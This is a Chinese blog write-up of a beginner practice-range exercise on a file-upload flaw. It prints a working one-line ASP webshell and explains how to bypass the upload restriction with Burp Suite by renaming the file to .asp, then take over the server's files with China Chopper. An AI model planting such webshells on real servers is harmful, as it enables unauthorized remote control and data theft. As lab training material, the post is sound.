墨者学院-入门级-内部文件上传系统漏洞分析溯源-小白必看(超详细)

2021年1月26日,第七次渗透测试。

准备需求:
1、win10系统;
2、中国菜刀;
3、bp拦截工具(不懂的看我以前的博客,有介绍);

1、进入靶场,有一个文件上传口;
在这里插入图片描述
2、我们新建一个文本文件,里面写上一句话muma;
一句话muma:<%eval request (“a”)%>
(这里的’a’是中国菜刀上的webshell密码,可自行更改;)
在这里插入图片描述
3、上传文件,拦截请求包;
以下为拦截包数据截图:
在这里插入图片描述
修改包数据,把“upload”改为“1.asp”;
在这里插入图片描述
然后释放拦截包,返回浏览器页面;
4、可以看到,我们已经得到了返回的地址,可以用菜刀进行远程连接;在这里插入图片描述
5、输入地址和webshell密码,进入后台文件管理;
在这里插入图片描述
6、进入到后台文件管理,看到KEY_2017619826.asp文件,直接打开,有获得key值;
在这里插入图片描述
在这里插入图片描述
一句话muma:
何为一句话muma,即此muma文件简单,简短,通常只有一句话,但是功能强大,入侵性强,通常伴随着中国菜刀来使用。
以下为百度的介绍,有兴趣了解更多的可以自行上网搜查;
在这里插入图片描述

小干货:
在使用中国菜刀时,每次实验完要把软件产生的数据文件删除,否则,当下次再使用其他地址进行连接时,地址栏不会进行转跳,这样我们就无法去到目标地址;
例如:我第一次实验连接地址为:192.168.1.1/html/www,连接后正常转跳到目标地址\html\www\;当我进行第二次实验,实验地址为:10.12.13.1/1.asp/25545622.txt,本来连接后我们转跳的地址应为C:\inetpub\的,但现实是连接后转跳的地址还是第一次实验的地址(即\html\www\),所以这里存在了缓存,我们要把之前的数据删除,再重新连接。
这个我研究了很久,废了很多时间,甚至上网搜查怎样清除中国菜刀的缓存,但没有结果,最后自己琢磨出了,希望大家遇到同样问题时我可以帮助到大家。

缓存文件(删除掉):
在这里插入图片描述

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值